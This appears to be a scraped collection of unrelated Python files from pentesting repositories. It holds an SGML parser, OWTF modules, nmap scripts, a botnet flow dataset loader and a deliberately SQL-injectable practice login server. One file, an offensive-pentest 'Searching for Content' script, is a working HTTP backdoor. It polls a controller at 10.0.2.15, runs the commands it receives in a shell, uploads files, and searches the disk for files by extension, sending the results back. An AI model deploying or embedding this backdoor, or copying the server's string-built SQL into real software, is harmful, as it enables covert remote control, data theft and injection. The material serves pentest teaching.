self.handle_pi(rawdata[i+2: j])
j = match.end(0)
return j-i
def get_starttag_text(self):
return self.__starttag_text
# Internal -- handle starttag, return length or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
start_pos = i
rawdata = self.rawdata
if shorttagopen.match(rawdata, i):
# SGML shorthand: <tag/data/ == <tag>data</tag>
# XXX Can data contain &... (entity or char refs)?
# XXX Can data contain < or > (tag characters)?
# XXX Can there be whitespace before the first /?
match = shorttag.match(rawdata, i)
if not match:
return -1
tag, data = match.group(1, 2)
self.__starttag_text = '<%s/' % tag
tag = tag.lower()
k = match.end(0)
self.finish_shorttag(tag, data)
self.__starttag_text = rawdata[start_pos:match.end(1) + 1]
return k
# XXX The following should skip matching quotes (' or ")
# As a shortcut way to exit, this isn't so bad, but shouldn't
# be used to locate the actual end of the start tag since the
# < or > characters may be embedded in an attribute value.
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
if rawdata[i:i+2] == '<>':
# SGML shorthand: <> == <last open tag seen>
k = j
tag = self.lasttag
else:
match = tagfind.match(rawdata, i+1)
if not match:
self.error('unexpected call to parse_starttag')
k = match.end(0)
tag = rawdata[i+1:k].lower()
self.lasttag = tag
while k < j:
match = attrfind.match(rawdata, k)
if not match: break
attrname, rest, attrvalue = match.group(1, 2, 3)
if not rest:
attrvalue = attrname
else:
if (attrvalue[:1] == "'" == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
# strip quotes
attrvalue = attrvalue[1:-1]
attrvalue = self.entity_or_charref.sub(
self._convert_ref, attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = match.end(0)
if rawdata[j] == '>':
j = j+1
self.__starttag_text = rawdata[start_pos:j]
self.finish_starttag(tag, attrs)
return j
# Internal -- convert entity or character reference
def _convert_ref(self, match):
if match.group(2):
return self.convert_charref(match.group(2)) or \
'&#%s%s' % match.groups()[1:]
elif match.group(3):
return self.convert_entityref(match.group(1)) or \
'&%s;' % match.group(1)
else:
return '&%s' % match.group(1)
# Internal -- parse endtag
def parse_endtag(self, i):
rawdata = self.rawdata
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
tag = rawdata[i+2:j].strip().lower()
if rawdata[j] == '>':
j = j+1
self.finish_endtag(tag)
return j
# Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>)
def finish_shorttag(self, tag, data):
self.finish_starttag(tag, [])
self.handle_data(data)
self.finish_endtag(tag)
# Internal -- finish processing of start tag
# Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag
def finish_starttag(self, tag, attrs):
try:
method = getattr(self, 'start_' + tag)
except AttributeError:
try:
method = getattr(self, 'do_' + tag)
except AttributeError:
self.unknown_starttag(tag, attrs)
return -1
else:
self.handle_starttag(tag, method, attrs)
return 0
else:
self.stack.append(tag)
self.handle_starttag(tag, method, attrs)
return 1
# Internal -- finish processing of end tag
def finish_endtag(self, tag):
if not tag:
found = len(self.stack) - 1
if found < 0:
self.unknown_endtag(tag)
return
else:
if tag not in self.stack:
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
self.unknown_endtag(tag)
else:
self.report_unbalanced(tag)
return
found = len(self.stack)
for i in range(found):
if self.stack[i] == tag: found = i
while len(self.stack) > found:
tag = self.stack[-1]
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
method = None
if method:
self.handle_endtag(tag, method)
else:
self.unknown_endtag(tag)
del self.stack[-1]
# Overridable -- handle start tag
def handle_starttag(self, tag, method, attrs):
method(attrs)
# Overridable -- handle end tag
def handle_endtag(self, tag, method):
method()
# Example -- report an unbalanced </...> tag.
def report_unbalanced(self, tag):
if self.verbose:
print '*** Unbalanced </' + tag + '>'
print '*** Stack:', self.stack
def convert_charref(self, name):
"""Convert character reference, may be overridden."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127:
return
return self.convert_codepoint(n)
def convert_codepoint(self, codepoint):
return chr(codepoint)
def handle_charref(self, name):
"""Handle character reference, no need to override."""
replacement = self.convert_charref(name)
if replacement is None:
self.unknown_charref(name)
else:
self.handle_data(replacement)
# Definition of entities -- derived classes may override
entitydefs = \
{'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''}
def convert_entityref(self, name):
"""Convert entity references.
As an alternative to overriding this method; one can tailor the
results by setting up the self.entitydefs mapping appropriately.
"""
table = self.entitydefs
if name in table:
return table[name]
else:
return
def handle_entityref(self, name):
"""Handle entity references, no need to override."""
replacement = self.convert_entityref(name)
if replacement is None:
self.unknown_entityref(name)
else:
self.handle_data(replacement)
# Example -- handle data, should be overridden
def handle_data(self, data):
pass
# Example -- handle comment, could be overridden
def handle_comment(self, data):
pass
# Example -- handle declaration, could be overridden
def handle_decl(self, decl):
pass
# Example -- handle processing instruction, could be overridden
def handle_pi(self, data):
pass
# To be overridden -- handlers for unknown objects
def unknown_starttag(self, tag, attrs): pass
def unknown_endtag(self, tag): pass
def unknown_charref(self, ref): pass
def unknown_entityref(self, ref): pass
class TestSGMLParser(SGMLParser):
def __init__(self, verbose=0):
self.testdata = ""
SGMLParser.__init__(self, verbose)
def handle_data(self, data):
self.testdata = self.testdata + data
if len(repr(self.testdata)) >= 70:
self.flush()
def flush(self):
data = self.testdata
if data:
self.testdata = ""
print 'data:', repr(data)
def handle_comment(self, data):
self.flush()
r = repr(data)
if len(r) > 68:
r = r[:32] + '...' + r[-32:]
print 'comment:', r
def unknown_starttag(self, tag, attrs):
self.flush()
if not attrs:
print 'start tag: <' + tag + '>'
else:
print 'start tag: <' + tag,
for name, value in attrs:
print name + '=' + '"' + value + '"',
print '>'
def unknown_endtag(self, tag):
self.flush()
print 'end tag: </' + tag + '>'
def unknown_entityref(self, ref):
self.flush()
print '*** unknown entity ref: &' + ref + ';'
def unknown_charref(self, ref):
self.flush()
print '*** unknown char ref: &#' + ref + ';'
def unknown_decl(self, data):
self.flush()
print '*** unknown decl: [' + data + ']'
def close(self):
SGMLParser.close(self)
self.flush()
def test(args = None):
import sys
if args is None:
args = sys.argv[1:]
if args and args[0] == '-s':
args = args[1:]
klass = SGMLParser
else:
klass = TestSGMLParser
if args:
file = args[0]
else:
file = 'test.html'
if file == '-':
f = sys.stdin
else:
try:
f = open(file, 'r')
except IOError, msg:
print file, ":", msg
sys.exit(1)
data = f.read()
if f is not sys.stdin:
f.close()
x = klass()
for c in data:
x.feed(c)
x.close()
if __name__ == '__main__':
test()
| 31.5875 | 79 | 0.506795 |
owtf | """
owtf.models.test_group
~~~~~~~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import relationship
from owtf.db.model_base import Model
class TestGroup(Model):
__tablename__ = "test_groups"
code = Column(String, primary_key=True)
group = Column(String) # web, network
descrip = Column(String)
hint = Column(String, nullable=True)
url = Column(String)
priority = Column(Integer)
plugins = relationship("Plugin")
@classmethod
def get_by_code(cls, session, code):
"""Get the test group based on plugin code
:param code: Plugin code
:type code: `str`
:return: Test group dict
:rtype: `dict`
"""
group = session.query(TestGroup).get(code)
return group.to_dict()
@classmethod
def get_all(cls, session):
"""Get all test groups from th DB
:return:
:rtype:
"""
test_groups = session.query(TestGroup).order_by(TestGroup.priority.desc()).all()
dict_list = []
for obj in test_groups:
dict_list.append(obj.to_dict())
return dict_list
| 23.723404 | 88 | 0.596899 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22;b=44;c=55;d=None
if a and b and c and d:
print("Not printed")
else:
print('Remember and operator -> All must evaluate to True !')
if a == b:
print("A and B are equal")
else:
print("A and B are not equal ! But we saw how to use == :)")
print("\nLets use some Bit wise operators with condition statements :\n")
a=2;b=2;c=0
bit_wise=a & b & c
if bit_wise:
print("Bit wise and returned non zero %s"%bit_wise)
else:
print("Bit wise and returned zero : %s"%bit_wise)
bit_wise=a&b
if bit_wise:
print("Now Bit wise and returned non zero : %s"%bit_wise)
else:
print("Again Bit wise and returned zero : %s"%bit_wise)
bit_wise_or = a | c
if bit_wise_or:
print("BIt wise OR - Should return 2 -> %s"%bit_wise_or)
else:
print("Thats strange !! -> %s"%bit_wise_or)
left_shift= a << b
if left_shift:
print("Remember Left shift has multiplication impact. -> %s"%left_shift)
else:
print("Thats strange !! -> %s"%left_shift)
right_shift= a >> b
if right_shift:
print("Thats strange !! -> %s"%right_shift)
else:
print("Remember Right shift has division impact. -> %s"%right_shift)
neg_minus_1= ~ a
if neg_minus_1 :
print("~ operator has (-n-1) impact - (-n-1) for %s -> %s "%(a,neg_minus_1))
else:
print("~ operator has (-n-1) impact - Produced 0 -> %s"%neg_minus_1)
| 25 | 77 | 0.65127 |
Ethical-Hacking-Scripts | import sqlite3, socket, threading, sys
class WebServer:
def __init__(self):
self.logo()
self.valid = False
self.name_list = ["admin adminpassword123456", "bobby cheeseburger69", "david 19216801", "mine craft", "jerry password", "tom jerry"]
self.names = ["admin","bobby","david","mine","jerry","tom"]
self.passwords = ["adminpassword123456", "cheeseburger69", "19216801", "craft", "password", "jerry"]
try:
self.ip = sys.argv[1]
self.port = int(sys.argv[2])
self.dbfile = "users.db"
try:
file = open(self.dbfile,"r")
except:
file = open(self.dbfile,"w")
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
try:
cursor.execute("select * from users")
except:
cursor.execute("create table users(name, password, logins)")
try:
for i in self.name_list:
cursor.execute(f"delete from users where name = '{i.split()[0]}'")
except:
pass
for i in self.name_list:
cursor.execute(f"insert into users values('{i.split()[0]}', '{i.split()[1]}', '0')")
print(f"\n[+] Try to break into these accounts via SQL Injection: {self.names}")
print(f"[+] In case you give up, here are the passwords to the accounts: {self.passwords}\n")
try:
self.externalip = sys.argv[3]
except Exception as e:
self.externalip = self.ip
self.valid = True
db.commit()
cursor.close()
db.close()
except Exception as e:
print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
if self.valid:
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.ip, self.port))
self.msgs = []
self.packet = self.gen_packet()
print(f"[+] Vulnerable SQL Web Server Started on: {self.ip}:{self.port}")
except Exception as e:
print(f"[+] Server Cannot be started due to Error: {e}")
self.valid = False
def logo(self):
print("""
__ __ _ _ _ _____ ____ _ _____ __ ___
\ \ / / | | | | | | / ____|/ __ \| | / ____| /_ | / _ \
\ \ / / _| |_ __ ___ _ __ __ _| |__ | | ___| (___ | | | | | | (___ ___ _ ____ _____ _ __ __ _| || | | |
\ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \| | | | | \___ \ / _ \ '__\ \ / / _ \ '__| \ \ / / || | | |
\ /| |_| | | | | | __/ | | (_| | |_) | | __/____) | |__| | |____ ____) | __/ | \ V / __/ | \ V /| || |_| |
\/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___\_\______| |_____/ \___|_| \_/ \___|_| \_/ |_(_)___/
Vulnerable Web Server made for Testing SQL Injections by DrSquid""")
def gen_packet(self, sqlquery="", script=""):
packet = f"""
<title>Vulnerable SQL Web Server</title>
<h1>Horrific Looking Login Page</h1>
This is a horrible looking login page. It is meant to be vulnerable to SQL Injections.
<form action="http://{self.externalip}:{self.port}">
<input type="text" placeholder="Username" name="name">
<h1></h1>
<input type="password" placeholder="Password" name="password">
<input type="submit" value="Log in">
<h4>Sql Query: {sqlquery}</h4>
</form>
{script}
"""
return packet
def listen(self):
if self.valid:
try:
print("[+] Server is listening For Connections.....")
if self.externalip != self.ip:
print(f"[+] Also listening on(for external connections): {self.externalip}:{self.port}")
print("")
while True:
ipaddr = ""
self.server.listen()
conn, ip = self.server.accept()
self.packet = self.gen_packet()
msg = conn.recv(1024).decode()
item = 0
msg_split = msg.split()
for i in msg_split:
if 'x-forwarded-for' in i.lower():
ipaddr = msg_split[item + 1]
break
item += 1
if ipaddr == "":
ipaddr = ip[0]
print(f"[+] {ipaddr} has connected.")
handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
handler.start()
except:
pass
def simplify_str(self, item):
return item.replace("+", " ").replace("%3C", "<").replace("%3E", ">").replace(
"%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B",
"+").replace("%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ","
).replace("%3B", ";").replace("%20", " ").replace("%3F", "?").replace("%5C", "\\"
).replace("%7B", "{").replace("%7D", "}").replace("%24", "$").replace("%0D", "\n"
).replace("%0A", " ").replace("%40","@").replace("%25", "%")
def authenticate(self, query):
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
cursor.execute(query)
item = cursor.fetchall()
if len(item) >= 1:
return True
else:
return False
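    # Safe counterpart (illustrative, deliberately unused -- this server exists
    # to demonstrate SQL injection): parameter binding keeps user input out of
    # the SQL text, so payloads like ' or '1'='1 no longer work.
    def authenticate_safe(self, username, password):
        db = sqlite3.connect(self.dbfile)
        cursor = db.cursor()
        cursor.execute("select * from users where name = ? and password = ?",
                       (username, password))
        found = len(cursor.fetchall()) >= 1
        cursor.close()
        db.close()
        return found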
def handler(self, conn, msg, ip):
try:
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
if "/?name=" in msg.split()[1] and "password" in msg.split()[1]:
try:
username = self.simplify_str(str(msg).split()[1].split("=")[1].replace("&password","")).lower()
password = self.simplify_str(str(msg).split()[1].split("=")[2]).lower()
script = ""
if username.strip() == "" or password.strip() == "":
conn.send(self.packet.encode())
else:
query = f"select * from users where name = '{username}' and password = '{password}'"
if self.authenticate(query):
script = "<script>alert('Logged in!')</script>"
print(f"[+] {ip} has logged into '{username}' with '{password}'.")
else:
script = "<script>alert('Invalid Name or Password.')</script>"
print(f"[+] {ip} had attempted to login to '{username}' with '{password}' but failed.")
packet = self.gen_packet(sqlquery=query, script=script)
conn.send(packet.encode())
            except Exception as e:
                print(f"[+] Error: {e}")
                # query/script may be unbound if the failure happened early
                packet = self.gen_packet()
                conn.send(packet.encode())
else:
conn.send(self.packet.encode())
conn.close()
except:
pass
e = WebServer()
e.listen()
| 48.302632 | 157 | 0.438943 |
cybersecurity-penetration-testing | import csv
import os
import logging
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
def csvWriter(output_data, headers, output_dir, output_name):
"""
The csvWriter function uses the csv.DictWriter module to write the list of dictionaries. The
DictWriter can take a fieldnames argument, as a list, which represents the desired order of columns.
:param output_data: The list of dictionaries containing embedded metadata.
:param headers: A list of keys in the dictionary that represent the desired order of columns in the output.
:param output_dir: The folder to write the output CSV to.
:param output_name: The name of the output CSV.
:return:
"""
msg = 'Writing ' + output_name + ' CSV output.'
print '[+]', msg
logging.info(msg)
with open(os.path.join(output_dir, output_name), 'wb') as outfile:
# We use DictWriter instead of Writer to write dictionaries to CSV.
writer = csv.DictWriter(outfile, fieldnames=headers)
# Writerheader writes the header based on the supplied headers object
writer.writeheader()
for dictionary in output_data:
if dictionary:
writer.writerow(dictionary)
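
if __name__ == '__main__':
    # Minimal demo with made-up values: writes a one-row CSV to the current
    # working directory.
    csvWriter([{'Name': 'a.jpg', 'Size': 1024}], ['Name', 'Size'], '.', 'demo.csv')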
| 37.90625 | 111 | 0.687299 |
Mastering-Machine-Learning-for-Penetration-Testing | import socket, struct, sys
import numpy as np
import pickle
def loaddata(fileName):
file = open(fileName, 'r')
xdata = []
ydata = []
xdataT = []
ydataT = []
flag=0
count1=0
count2=0
count3=0
count4=0
#dicts to convert protocols and state to integers
protoDict = {'arp': 5, 'unas': 13, 'udp': 1, 'rtcp': 7, 'pim': 3, 'udt': 11, 'esp': 12, 'tcp' : 0, 'rarp': 14, 'ipv6-icmp': 9, 'rtp': 2, 'ipv6': 10, 'ipx/spx': 6, 'icmp': 4, 'igmp' : 8}
stateDict = {'': 1, 'FSR_SA': 30, '_FSA': 296, 'FSRPA_FSA': 77, 'SPA_SA': 31, 'FSA_SRA': 1181, 'FPA_R': 46, 'SPAC_SPA': 37, 'FPAC_FPA': 2, '_R': 1, 'FPA_FPA': 784, 'FPA_FA': 66, '_FSRPA': 1, 'URFIL': 431, 'FRPA_PA': 5, '_RA': 2, 'SA_A': 2, 'SA_RA': 125, 'FA_FPA': 17, 'FA_RA': 14, 'PA_FPA': 48, 'URHPRO': 380, 'FSRPA_SRA': 8, 'R_':541, 'DCE': 5, 'SA_R': 1674, 'SA_': 4295, 'RPA_FSPA': 4, 'FA_A': 17, 'FSPA_FSPAC': 7, 'RA_': 2230, 'FSRPA_SA': 255, 'NNS': 47, 'SRPA_FSPAC': 1, 'RPA_FPA': 42, 'FRA_R': 10, 'FSPAC_FSPA': 86, 'RPA_R': 3, '_FPA': 5, 'SREC_SA': 1, 'URN': 339, 'URO': 6, 'URH': 3593, 'MRQ': 4, 'SR_FSA': 1, 'SPA_SRPAC': 1, 'URP': 23598, 'RPA_A': 1, 'FRA_': 351, 'FSPA_SRA': 91, 'FSA_FSA': 26138, 'PA_': 149, 'FSRA_FSPA': 798, 'FSPAC_FSA': 11, 'SRPA_SRPA': 176, 'SA_SA': 33, 'FSPAC_SPA': 1, 'SRA_RA': 78, 'RPAC_PA': 1, 'FRPA_R': 1, 'SPA_SPA': 2989, 'PA_RA': 3, 'SPA_SRPA': 4185, 'RA_FA': 8, 'FSPAC_SRPA': 1, 'SPA_FSA': 1, 'FPA_FSRPA': 3, 'SRPA_FSA': 379, 'FPA_FRA': 7, 'S_SRA': 81, 'FSA_SA': 6, 'State': 1, 'SRA_SRA': 38, 'S_FA': 2, 'FSRPAC_SPA': 7, 'SRPA_FSPA': 35460, 'FPA_A': 1, 'FSA_FPA': 3, 'FRPA_RA': 1, 'FSAU_SA': 1, 'FSPA_FSRPA': 10560, 'SA_FSA': 358, 'FA_FRA': 8, 'FSRPA_SPA': 2807, 'FSRPA_FSRA': 32, 'FRA_FPA': 6, 'FSRA_FSRA': 3, 'SPAC_FSRPA': 1, 'FS_': 40, 'FSPA_FSRA': 798, 'FSAU_FSA': 13, 'A_R': 36, 'FSRPAE_FSPA': 1, 'SA_FSRA': 4, 'PA_PAC': 3, 'FSA_FSRA': 279, 'A_A': 68, 'REQ': 892, 'FA_R': 124, 'FSRPA_SRPA': 97, 'FSPAC_FSRA':20, 'FRPA_RPA': 7, 'FSRA_SPA': 8, 'INT': 85813, 'FRPA_FRPA': 6, 'SRPAC_FSPA': 4, 'SPA_SRA': 808, 'SA_SRPA': 1, 'SPA_FSPA': 2118, 'FSRAU_FSA': 2, 'RPA_PA': 171,'_SPA': 268, 'A_PA': 47, 'SPA_FSRA': 416, 'FSPA_FSRPAC': 2, 'PAC_PA': 5, 'SRPA_SPA': 9646, 'SRPA_FSRA': 13, 'FPA_FRPA': 49, 'SRA_SPA': 10, 'SA_SRA': 838, 'PA_PA': 5979, 'FPA_RPA': 27, 'SR_RA': 10, 'RED': 4579, 'CON': 2190507, 'FSRPA_FSPA':13547, 'FSPA_FPA': 4, 'FAU_R': 2, 'ECO': 2877, 'FRPA_FPA': 72, 'FSAU_SRA': 1, 'FRA_FA': 8, 'FSPA_FSPA': 216341, 'SEC_RA': 19, 'ECR': 3316, 'SPAC_FSPA': 12, 'SR_A': 34, 'SEC_': 5, 'FSAU_FSRA': 3, 'FSRA_FSRPA': 11, 'SRC': 13, 'A_RPA': 1, 'FRA_PA': 3, 'A_RPE': 1, 'RPA_FRPA': 20, '_SRA': 74, 'SRA_FSPA': 293, 'FPA_': 118, 'FSRPAC_FSRPA': 2, '_FA': 1, 'DNP': 1, 'FSRPA_FSRPA': 379, 'FSRA_SRA': 14, '_FRPA': 1, 'SR_': 59, 'FSPA_SPA': 517, 'FRPA_FSPA': 1, 'PA_A': 159, 'PA_SRA': 1, 'FPA_RA': 5, 'S_': 68710, 'SA_FSRPA': 4, 'FSA_FSRPA': 1, 'SA_SPA': 4, 'RA_A': 5, '_SRPA': 9, 'S_FRA': 156, 'FA_FRPA': 1, 'PA_R': 72, 'FSRPAEC_FSPA': 1, '_PA': 7, 'RA_S': 1, 'SA_FR': 2, 'RA_FPA': 6, 'RPA_': 5, '_FSPA': 2395, 'FSA_FSPA': 230, 'UNK': 2, 'A_RA': 9, 'FRPA_': 6, 'URF': 10, 'FS_SA': 97, 'SPAC_SRPA': 8, 'S_RPA': 32, 'SRPA_SRA': 69, 'SA_RPA': 30, 'PA_FRA': 4, 'FSRA_SA': 49, 'FSRA_FSA': 206, 'PAC_RPA': 1, 'SRA_': 18, 'FA_': 451, 'S_SA': 6917, 'FSPA_SRPA': 427, 'TXD': 542,'SRA_SA': 1514, 'FSPA_FA': 1, 'FPA_FSPA': 10, 'RA_PA': 3, 'SRA_FSA': 709, 'SRPA_SPAC': 3, 'FSPAC_FSRPA': 10, 'A_': 191, 'URNPRO': 2, 'PA_RPA': 81, 'FSPAC_SRA':1, 'SRPA_FSRPA': 3054, 'SPA_': 1, 'FA_FA': 259, 'FSPA_SA': 75, 'SR_SRA': 1, 'FSA_': 2, 'SRPA_SA': 406, 'SR_SA': 3119, 'FRPA_FA': 1, 'PA_FRPA': 13, 'S_R': 34, 'FSPAEC_FSPAE': 3, 'S_RA': 61105, 'FSPA_FSA': 5326, '_SA': 20, 'SA_FSPA': 15, 'SRPAC_SPA': 8, 'FPA_PA': 19, 'FSRPAE_FSA': 1, 'S_A': 1, 'RPA_RPA': 3, 'NRS': 6, 'RSP': 115, 'SPA_FSRPA': 1144, 'FSRPAC_FSPA': 139}
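    # Equivalent encoding (illustrative, unused): scikit-learn's LabelEncoder
    # derives the same kind of categorical->integer mapping automatically:
    #   from sklearn.preprocessing import LabelEncoder
    #   enc = LabelEncoder().fit(['tcp', 'udp', 'icmp'])  # sample values
    #   enc.transform(['udp'])                            # -> array([2])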
file.readline() # skip the CSV header row
for line in file:
sd = line[:-1].split(',')
dur, proto, Sport, Dport, Sip, Dip, totP, totB, label, state = sd[1], sd[2], sd[4], sd[7], sd[3], sd[6], sd[-4], sd[-3], sd[-1], sd[8]
try:
Sip = socket.inet_aton(Sip)
Sip = struct.unpack("!L", Sip)[0]
except:
continue
try:
Dip = socket.inet_aton(Dip)
Dip = struct.unpack("!L", Dip)[0]
except:
continue
if Sport=='': continue
if Dport=='': continue
	# map labels: Background/Normal -> 0, Botnet -> 1
try:
if "Background" in label:
label=0
elif "Normal" in label:
label = 0
elif "Botnet" in label:
label = 1
if flag==0:
			# Training set: up to 20,000 flows per class
if label==0 and count1<20001:
xdata.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydata.append(label)
count1+=1
elif label==1 and count2<20001:
xdata.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydata.append(label)
count2+=1
			elif count1>19999 and count2>19999:
				# both classes filled: switch to building the test set
				flag=1
else:
			# Test set: up to 5,000 flows per class
			if label==0 and count3<5001:
xdataT.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydataT.append(label)
count3+=1
elif label==1 and count4<5001:
xdataT.append([float(dur), protoDict[proto], int(Sport), int(Dport), Sip, Dip, int(totP), int(totB), stateDict[state]])
ydataT.append(label)
count4 += 1
elif count3>4999 and count4>4999:
break
except:
continue
#pickle the dataset for fast loading on subsequent runs
picklefile = open('flowdata.pickle', 'wb')
pickle.dump([np.array(xdata), np.array(ydata), np.array(xdataT), np.array(ydataT)], picklefile)
picklefile.close()
#return the training and the test dataset
return np.array(xdata), np.array(ydata), np.array(xdataT), np.array(ydataT)
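# A minimal usage sketch (assuming scikit-learn is installed): feed the returned
# arrays to a classifier. RandomForestClassifier is an illustrative choice here,
# not something mandated by the original script.
def train_example():
    from sklearn.ensemble import RandomForestClassifier
    xdata, ydata, xdataT, ydataT = loaddata('flowdata.binetflow')
    clf = RandomForestClassifier(n_estimators=100)
    clf.fit(xdata, ydata)              # train on the ~40k balanced flows
    print(clf.score(xdataT, ydataT))   # accuracy on the ~10k held-out flows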
if __name__ == "__main__":
loaddata('flowdata.binetflow')
| 65.427083 | 3,337 | 0.507058 |
Effective-Python-Penetration-Testing | import nmap # import nmap.py module
nmap = nmap.PortScanner()
host = '127.0.0.1'
nmap.scan(host, '1-1024')
print nmap.command_line()
print nmap.scaninfo()
for host in nmap.all_hosts():
print('Host : %s (%s)' % (host, nmap[host].hostname()))
print('State : %s' % nmap[host].state())
for proto in nmap[host].all_protocols():
print('Protocol : %s' % proto)
        listport = nmap[host][proto].keys()  # ports seen for this protocol, not just TCP
        listport.sort()
for port in listport:
print('port : %s\tstate : %s' % (port, nmap[host][proto][port]['state']))
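# A hedged aside: python-nmap's scan() also accepts an explicit port list and raw
# Nmap flags, e.g. nmap.scan(host, ports='22,80,443', arguments='-sV') to run
# service/version detection on selected ports only.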
| 26.35 | 77 | 0.606227 |
cybersecurity-penetration-testing | import sys
import os
import nmap
nm = nmap.PortScanner()
with open("./nmap_output.xml", "r") as fd:
content = fd.read()
nm.analyse_nmap_xml_scan(content)
print(nm.csv()) | 19.375 | 42 | 0.635802 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Searching for Content
import requests
import subprocess
import os
import time
while True:
req = requests.get('http://10.0.2.15')
command = req.text
if 'terminate' in command:
break
elif 'grab' in command:
grab,path=command.split('*')
if os.path.exists(path):
url = 'http://10.0.2.15/store'
files = {'file': open(path, 'rb')}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://10.0.2.15', data='[-] Not able to find the file !' )
    elif 'search' in command: # The format is: search <path>*.<file extension> , e.g. search C:\\*.pdf
        # dropping the first 7 characters ('search ') leaves C:\\*.pdf, which is what we need
        command = command[7:]
        path,ext=command.split('*') # split C:\\*.pdf at the '*': 'C:\\' goes into path, '.pdf' into ext
        results = '' # accumulator string for the matching file paths
        '''
        os.walk navigates ALL the directories under the provided path and, for each one, yields three values:
        dirpath  - a string containing the path to the directory
        dirnames - a list of the names of the subdirectories in dirpath
        files    - a list of the file names in dirpath
        Once we have the files list, we check each file (using a for loop); if its extension matches what
        we are looking for, we append its path to the results string. os.path.join builds the full path of
        the file relative to the starting directory, which in our example is C:\\
        '''
for dirpath, dirname, files in os.walk(path):
for file in files:
if file.endswith(ext):
                    results = results + '\n' + os.path.join(dirpath, file)
        requests.post(url='http://10.0.2.15', data= results ) # send the search results back
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://10.0.2.15', data=CMD.stdout.read() )
post_response = requests.post(url='http://10.0.2.15', data=CMD.stderr.read() )
time.sleep(3)
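
# A minimal listener sketch for the other end of this channel (assumptions: the
# 10.0.2.15 control host above, Python 2; this mirrors the GET-command /
# POST-result protocol implied by the comments and is NOT part of the original):
#
#   from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
#   class Handler(BaseHTTPRequestHandler):
#       def do_GET(self):   # hand the next command to the polling client
#           self.send_response(200); self.end_headers()
#           self.wfile.write(raw_input('Shell> '))
#       def do_POST(self):  # print whatever the client posts back
#           self.send_response(200); self.end_headers()
#           print self.rfile.read(int(self.headers['Content-Length']))
#   HTTPServer(('10.0.2.15', 80), Handler).serve_forever()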
| 33.868421 | 141 | 0.596074 |
owtf | """
GREP Plugin for Logout and Browse cache management
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Cache snooping protections"
def run(PluginInfo):
title = "This plugin looks for server-side protection headers and tags against cache snooping<br />"
Content = plugin_helper.HtmlString(title)
Content += plugin_helper.FindResponseHeaderMatchesForRegexpName(
"HEADERS_FOR_CACHE_PROTECTION"
)
Content += plugin_helper.FindResponseBodyMatchesForRegexpName(
"RESPONSE_REGEXP_FOR_CACHE_PROTECTION"
)
return Content
| 33.8 | 104 | 0.755396 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
import wal_crawler
import setupapi
import userassist
import exif
import id3
import office
import pst_indexer
| 14.6 | 44 | 0.793548 |
owtf | """
owtf.api.handlers.report
~~~~~~~~~~~~~~~~~~~~~~~~
"""
import collections
from collections import defaultdict
from time import gmtime, strftime
from owtf.api.handlers.base import APIRequestHandler
from owtf.constants import RANKS, MAPPINGS, SUPPORTED_MAPPINGS
from owtf.lib import exceptions
from owtf.lib.exceptions import APIError
from owtf.managers.poutput import get_all_poutputs
from owtf.managers.target import get_target_config_by_id
from owtf.models.test_group import TestGroup
from owtf.utils.pycompat import iteritems
from owtf.api.handlers.jwtauth import jwtauth
__all__ = ["ReportExportHandler"]
@jwtauth
class ReportExportHandler(APIRequestHandler):
"""Class handling API methods related to export report funtionality.
This API returns all information about a target scan present in OWTF.
    :raise InvalidTargetReference: If the target doesn't exist.
    :raise InvalidParameterType: If an unknown parameter appears in `filter_data`.
"""
SUPPORTED_METHODS = ["GET"]
def get(self, target_id=None):
"""Returns JSON(data) for the template.
**Example request**:
.. sourcecode:: http
GET /api/v1/targets/2/export HTTP/1.1
Accept: application/json
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": {
"top_url": "https://google.com:443",
"top_domain": "com",
"target_url": "https://google.com",
"time": "2018-04-03 09:21:27",
"max_user_rank": -1,
"url_scheme": "https",
"host_path": "google.com",
"ip_url": "https://104.28.0.9",
"host_ip": "104.28.0.9",
"vulnerabilities": [],
"max_owtf_rank": -1,
"port_number": "443",
"host_name": "google.com",
"alternative_ips": "['104.28.1.9']",
"scope": true,
"id": 2
}
}
"""
if not target_id:
